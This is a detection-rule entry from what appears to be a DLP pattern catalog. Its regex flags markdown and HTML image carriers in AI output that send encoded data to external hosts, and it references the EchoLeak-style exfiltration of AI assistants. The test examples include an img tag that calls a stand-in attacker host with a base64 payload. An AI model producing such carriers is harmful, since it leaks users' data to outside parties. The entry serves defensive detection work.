AI Data-Exfiltration Marker
Detects data-exfiltration carriers in AI/LLM output: markdown images or links and HTML img tags whose URL points off-tenant and carries an encoded data payload in the path or query. This is an EchoLeak-style (cf. CVE-2025-32711) generic markdown/HTML exfiltration-carrier marker - it flags the carrier shape, not the full CVE mechanism (which also involves XPIA evasion and a Teams proxy/CSP bypass).
- Type
- regex
- Engine
- universal
- Confidence
- high
- Confidence justification
- High/precision-gated: fires on outbound content, so tuned for low FP. Requires an external host plus a long encoded payload; corporate-host and test-text exclusions remove the named FP traps.
- Jurisdictions
- global
- Regulations
- OWASP LLM Top 10 2025, NIST AI RMF GenAI Profile
- Frameworks
- ISO 27001
- Data categories
- emerging, security
- Risk rating
- 9
- Platform compatibility
- Purview: Compatible, GCP DLP: Compatible, Macie: Compatible, Zscaler: Compatible, Palo Alto: Compatible, Netskope: Compatible
Pattern
!\[[^\]]*\]\(\s*https?://[^)\s]+[?#&][^)\s]*=[^)\s]{16,}\)
Corroborative evidence keywords
image, link, markdown, render, AI, artificial intelligence, LLM, large language model, Copilot, chatbot, assistant, agent, prompt, system prompt, tool call, completion, model
Proximity: 300 characters
Should match
— Markdown image to external host with long base64-like query payload<img src="https://attacker.test/p?x=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo">— HTML img tag to external host with encoded payload
Should not match
— SharePoint deep link (corporate host, no data payload)— Analytics URL with short, non-data parameter